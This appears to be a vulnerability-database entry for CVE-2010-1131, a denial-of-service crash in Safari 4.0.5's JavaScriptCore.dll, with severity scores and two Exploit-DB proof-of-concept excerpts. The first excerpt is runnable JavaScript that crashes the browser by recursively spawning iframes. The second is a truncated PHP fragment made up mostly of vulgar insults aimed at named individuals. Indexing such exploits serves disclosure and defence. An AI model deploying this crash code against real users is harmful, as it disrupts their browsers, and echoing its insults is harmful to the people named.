CVE-2010-1131
published 2010-03-27CVE-2010-1131: JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML…
PriorityP415medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
3.84%
88.8th percentile
JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the substring.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion
exploitdb·2010-05-03
CVE-2010-1131 Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion
Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion
---
window.print();
a();
function a()
{
setInterval(b,0);
}
function b()
{
var c = document.createElement("iframe");
c.setAttribute("src",document.location);
document.getElementsByTagName("body")[0].appendChild(c);
setInterval(a,0);
}
Exploit-DB
Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)
exploitdb·2010-03-22
CVE-2010-1131 Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)
Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)
---
",10000);
echo "SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)";
echo "Wait please...Crash is coming...";
echo "Spanish message for my friends:";
echo "0wn3Dsss!!";
echo "TiTo MC es un negro cabron que rapea como el puto culo.";
echo "Chema Alonso a.k.a. maligno a.k.a. neo payaso MS.";
echo "Eres vergonzoso, penoso, lamo, n44b, l3l,...";
echo "Tus reflexiones son tristes y pobres, vas a comision? das pena chaval!";
echo "Putos focaaaas!";
echo "Greetz to my team: Spanishiit Team. Welcome everyone!";
echo "We'll come back fucking more people...Sure!";
echo "";
echo "I ";
echo $fuzz;
?>
No writeups or analysis indexed.
2010-03-27
Published